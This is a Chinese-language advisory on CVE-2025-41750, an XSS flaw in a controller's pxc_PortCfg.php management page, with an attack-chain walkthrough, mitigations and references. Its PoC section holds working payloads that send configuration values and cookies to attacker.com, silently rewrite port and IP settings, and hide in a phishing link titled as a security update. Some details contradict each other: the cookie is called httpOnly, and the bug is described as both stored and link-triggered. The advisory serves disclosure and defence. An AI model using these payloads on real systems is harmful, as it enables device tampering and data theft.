CVE-2025-41750 pxc_PortCfg.php 跨站脚本(XSS)漏洞

漏洞信息

漏洞编号

CVE-2025-41750

漏洞类型

XSS (跨站脚本攻击)

CVSS评分

7.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

pxc_PortCfg.php (Perception Xtension Controller Web Management)

漏洞概述

CVE-2025-41750是发生在pxc_PortCfg.php文件中的一个存储型跨站脚本(XSS)漏洞。该漏洞存在于Perception Xtension Controller的Web-based Management(WBM)管理界面中。攻击者可以利用此漏洞，通过构造恶意链接诱导已认证的管理员用户点击，从而在受害者浏览器中执行任意JavaScript脚本。由于该漏洞允许攻击者修改WBM中可用的设备配置参数，因此可能对系统的机密性、完整性和可用性造成一定影响。虽然session cookie设置了httpOnly标志，攻击者无法直接窃取会话凭证，但攻击者仍可通过XSS攻击修改管理配置、执行钓鱼攻击或诱导用户执行其他操作。此漏洞的CVSS评分为7.1，属于高危级别，需要管理员交互才能触发，攻击向量为网络层面，无需特殊权限即可发起攻击。建议受影响用户及时关注厂商发布的安全更新，并采取相应的临时缓解措施。

技术细节

该XSS漏洞位于pxc_PortCfg.php文件中，主要影响Web-based Management(WBM)界面的参数配置功能。攻击者通过在URL参数或表单输入中注入恶意JavaScript代码，当已认证的管理员用户访问包含恶意代码的链接时，浏览器会执行这些脚本代码。由于WBM管理界面允许配置设备参数，攻击者可以利用XSS漏洞：(1)通过JavaScript修改管理配置参数，如端口配置、网络设置等；(2)注入恶意代码进行钓鱼攻击，诱导管理员泄露敏感信息；(3)在管理员不知情的情况下执行配置变更操作。漏洞利用的关键条件包括：攻击者需要构造包含XSS payload的恶意链接，并通过社会工程学手段诱骗管理员点击。虽然session cookie设置了httpOnly标志可防止JavaScript直接读取，但攻击者仍可通过DOM操作修改页面内容或发起后续攻击。攻击者通常会使用短链接或URL缩短服务来隐藏恶意链接的真实意图，提高攻击成功率。防御此类漏洞需要在服务器端对所有用户输入进行严格的输入验证和输出编码，确保特殊字符被正确转义。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者首先识别目标系统中运行Perception Xtension Controller的Web管理界面，并确认pxc_PortCfg.php文件的存在和可访问性。

STEP 2

步骤2: Payload构造

攻击者根据XSS漏洞特点，构造包含恶意JavaScript代码的payload，payload可能嵌入在URL参数、表单输入或其他用户可控的输入点中。

STEP 3

步骤3: 社会工程攻击

攻击者通过钓鱼邮件、即时通讯或其他渠道向目标管理员发送包含恶意链接的消息，使用社会工程学技术诱骗管理员点击链接。

STEP 4

步骤4: 触发漏洞

当管理员点击恶意链接访问pxc_PortCfg.php页面时，恶意JavaScript代码在管理员浏览器中执行，可以获取页面内容或修改配置参数。

STEP 5

步骤5: 配置篡改

攻击者通过JavaScript代码修改WBM中的设备配置参数，如端口设置、网络配置等，实现对目标系统的配置篡改。

STEP 6

步骤6: 持久化控制

如果漏洞为存储型XSS，恶意代码可能永久保存在服务器端，后续访问该页面的管理员都会触发攻击，实现持久化控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-41750 XSS PoC -->
<!-- 恶意链接构造示例 -->

<!-- 基本XSS Payload -->
<a href="http://target-host/pxc_PortCfg.php?param=<script>alert('XSS')</script>">Click me</a>

<!-- 窃取配置参数的XSS Payload -->
<script>
  // 获取页面中的配置参数
  var configs = document.querySelectorAll('input[name*="cfg"]');
  var stolenData = [];
  configs.forEach(function(input) {
    stolenData.push(input.value);
  });
  
  // 发送到攻击者控制的服务器
  var exfil = new Image();
  exfil.src = "http://attacker.com/log?data=" + btoa(JSON.stringify(stolenData));
</script>

<!-- 修改配置参数的XSS Payload -->
<script>
  // 遍历所有可编辑的输入框
  var inputs = document.querySelectorAll('input[type="text"], select');
  inputs.forEach(function(input) {
    // 检查是否为关键配置参数
    if (input.name.includes('port') || input.name.includes('ip')) {
      // 修改为攻击者指定的值
      input.value = 'malicious_value';
    }
  });
  
  // 自动提交表单
  var form = document.querySelector('form');
  if (form) {
    form.submit();
  }
</script>

<!-- 完整的社会工程攻击链接 -->
<!-- 建议管理员点击此链接查看'重要安全更新' -->
<a href="http://target-host/pxc_PortCfg.php?port=<img src=x onerror='fetch("http://attacker.com/steal?cookie="+document.cookie)'>">View Important Security Update</a>

影响范围

Perception Xtension Controller (所有使用pxc_PortCfg.php的版本)

具体版本信息需参考厂商官方公告

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：(1)禁用或限制WBM管理界面的公开访问，仅允许通过VPN或受信任网络访问；(2)对管理员进行安全意识培训，提高对钓鱼攻击的警惕性；(3)启用WAF(Web应用防火墙)规则检测和阻止XSS攻击特征；(4)定期检查WBM配置参数，及时发现未经授权的配置变更；(5)考虑启用双因素认证增强管理界面安全性；(6)记录和监控所有WBM访问日志，便于发现异常行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-41750
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-41750
3 Details https://www.cvedetails.com/cve/CVE-2025-41750/
4 VulDB https://vuldb.com/cve/CVE-2025-41750
5 Link https://certvde.com/de/advisories/VDE-2025-071